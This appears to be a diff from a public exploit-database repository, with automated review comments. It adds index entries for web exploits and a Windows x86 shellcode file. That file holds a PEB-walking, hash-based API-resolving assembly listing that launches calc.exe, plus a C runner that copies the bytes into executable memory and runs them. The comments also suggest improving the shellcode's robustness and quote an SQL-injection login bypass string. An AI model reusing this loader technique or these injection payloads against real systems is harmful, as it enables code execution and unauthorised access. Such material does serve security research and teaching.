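Review bot: Steps 1 and 4 were copied from the Dairy Farm advisory — they point at `http://localhost/dfsms/index.php` and say to set the password to `dfsms` — while the PoC request targets `/dms/admin/` and injects `admin' or '1'='1` into both fields; the steps should match the request, e.g. `Step 1 – Go to the admin panel http://localhost/dms/admin/` and `Step 4 – Set both username and password to admin' or '1'='1`. The header credits `SUDONINJA` while the files_exploits.csv entry for 50370 in this same commit lists "Sanjay Singh"; one of the two is wrong and should be reconciled.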
@@ -44474,3 +44474,12 @@ id,file,description,date,author,type,platform,port
 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
 50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,
+50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
+50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping",1970-01-01,"Cristian \'void\' Giustini",webapps,php,
+50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
+50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - File Upload to XSS",1970-01-01,"Okan Kurtulus",webapps,php,
+50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
+50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
+50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
+50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
+50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 5d6d1105b..d7c2e1ee8 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1042,3 +1042,4 @@ id,file,description,date,author,type,platform
 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
+50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
diff --git a/shellcodes/windows_x86/50368.c b/shellcodes/windows_x86/50368.c
new file mode 100644
index 000000000..d42d3c2ec
--- /dev/null
+++ b/shellcodes/windows_x86/50368.c
@@ -0,0 +1,187 @@ +; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) + +; Description: + +; This is a shellcode that pop a calc.exe. The shellcode iuses +; the PEB method to locate the baseAddress of the required module and the Export Directory Table +; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required +; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec +; and exits gracefully using TerminateProcess. + +; Author: h4pp1n3ss +; Date: Wed 09/22/2021 +; Tested on: Microsoft Windows [Version 10.0.19042.1237] + +start: + + mov ebp, esp ; prologue + add esp, 0xfffff9f0 ; Add space int ESP to avoid clobbering + + + find_kernel32: + xor ecx, ecx ; ECX = 0 + mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30]) + mov esi,[esi+0x0C] ; ESI = PEB->Ldr + mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder + + next_module: + mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address + mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name + mov esi, [esi] ; ESI = InInitOrder[X].flink (next) + cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ? 
+ jne next_module ; No: try next module + + find_function_shorten: + jmp find_function_shorten_bnc ; Short jump + + find_function_ret: + pop esi ; POP the return address from the stack + mov [ebp+0x04], esi ; Save find_function address for later usage + jmp resolve_symbols_kernel32 ; + + find_function_shorten_bnc: + call find_function_ret ; Relative CALL with negative offset + + find_function: + pushad ; Save all registers + + mov eax, [ebx+0x3c] ; Offset to PE Signature + mov edi, [ebx+eax+0x78] ; Export Table Directory RVA + add edi, ebx ; Export Table Directory VMA + mov ecx, [edi+0x18] ; NumberOfNames + mov eax, [edi+0x20] ; AddressOfNames RVA + add eax, ebx ; AddressOfNames VMA + mov [ebp-4], eax ; Save AddressOfNames VMA for later + + find_function_loop: + jecxz find_function_finished ; Jump to the end if ECX is 0 + dec ecx ; Decrement our names counter + mov eax, [ebp-4] ; Restore AddressOfNames VMA + mov esi, [eax+ecx*4] ; Get the RVA of the symbol name + add esi, ebx ; Set ESI to the VMA of the current symbol name + + compute_hash: + xor eax, eax ; NULL EAX + cdq ; NULL EDX + cld ; Clear direction + + compute_hash_again: + lodsb ; Load the next byte from esi into al + test al, al ; Check for NULL terminator + jz compute_hash_finished ; If the ZF is set, we've hit the NULL term + ror edx, 0x0d ; Rotate edx 13 bits to the right + add edx, eax ; Add the new byte to the accumulator + jmp compute_hash_again ; Next iteration + + compute_hash_finished: + + find_function_compare: + cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash + jnz find_function_loop ; If it doesn't match go back to find_function_loop + mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA + add edx, ebx ; AddressOfNameOrdinals VMA + mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal + mov edx, [edi+0x1c] ; AddressOfFunctions RVA + add edx, ebx ; AddressOfFunctions VMA + mov eax, [edx+4*ecx] ; Get the function RVA + add eax, ebx ; Get the function VMA + mov [esp+0x1c], 
eax ; Overwrite stack version of eax from pushad + + find_function_finished: + popad ; Restore registers + ret ; + + resolve_symbols_kernel32: + push 0xe8afe98 ; WinExec hash + call dword ptr [ebp+0x04] ; Call find_function + mov [ebp+0x10], eax ; Save WinExec address for later usage + push 0x78b5b983 ; TerminateProcess hash + call dword ptr [ebp+0x04] ; Call find_function + mov [ebp+0x14], eax ; Save TerminateProcess address for later usage + + create_calc_string: + xor eax, eax ; EAX = null + push eax ; Push null-terminated string + push dword 0x6578652e ; + push dword 0x636c6163 ; + push esp ; ESP = &(lpCmdLine) + pop ebx ; EBX save pointer to string + + ; UINT WinExec( + ; LPCSTR lpCmdLine, -> EBX + ; UINT uCmdShow -> EAX + ; ); + + call_winexec: + xor eax, eax ; EAX = null + push eax ; uCmdShow + push ebx ; lpCmdLine + call dword ptr [ebp+0x10] ; Call WinExec + + ; BOOL TerminateProcess( + ; HANDLE hProcess, -> 0xffffffff + ; UINT uExitCode -> EAX + ; ); + + terminate_process: + xor eax, eax ; EAX = null + push eax ; uExitCode + push 0xffffffff ; hProcess + call dword ptr [ebp+0x14] ; Call TerminateProcess + + +[!]===================================== POC ========================================= [!] 
+ +/* + + Shellcode runner author: reenz0h (twitter: @sektor7net) + +*/ +#include +#include +#include +#include + +// Our WinExec PopCalc shellcode + +unsigned char payload[] = +"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e" +"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43" +"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b" +"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75" +"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61" +"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0" +"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff" +"\xff\x55\x14"; + + +unsigned int payload_len = 178; + +int main(void) { + + void * exec_mem; + BOOL rv; + HANDLE th; + DWORD oldprotect = 0; + + // Allocate a memory buffer for payload + exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + + // Copy payload to new buffer + RtlMoveMemory(exec_mem, payload, payload_len); + + // Make new buffer as executable + rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); + + printf("\nHit me!\n"); + printf("Shellcode Length: %d\n", strlen(payload)); + getchar(); + + // If all good, run the payload + if ( rv != 0 ) { + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); + WaitForSingleObject(th, -1); + } + + return 0; +} \ No newline at end of file
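Review bot: The shellcode stores the find_function, WinExec and TerminateProcess addresses at `[ebp+0x04]`, `[ebp+0x10]` and `[ebp+0x14]`, which lie above the entry stack pointer in the caller's frame; that is harmless in this runner only because TerminateProcess never returns, but in a real exploit that region may hold live data (the thread start routine's return address and argument), so the three saves and their matching `call dword ptr` operands should use slots below ebp (e.g. `[ebp-0x08]`, `[ebp-0x0c]`, `[ebp-0x10]`), which the `add esp, 0xfffff9f0` reservation already leaves free since `[ebp-4]` is the only local in use. As committed the file is not compilable C: the NASM listing (`;` comments, labels, `mov esi,fs:[ecx+0x30]`) and the `[!]=== POC ===` banner sit outside any comment, so either wrap the listing in a `/* ... */` block or ship it as a separate `.asm`. In the runner, `VirtualAlloc` and `CreateThread` results are unchecked, `printf("Shellcode Length: %d\n", strlen(payload))` passes a `size_t` to `%d` — print `payload_len` with `%u` — and the `#include` lines have lost their header names as rendered here. The `cmp [edi+12*2], cx` test selects the first InInitOrder module whose name is exactly 12 characters, which is kernel32.dll on the tested build but is a length heuristic rather than a name comparison and deserves a comment saying so.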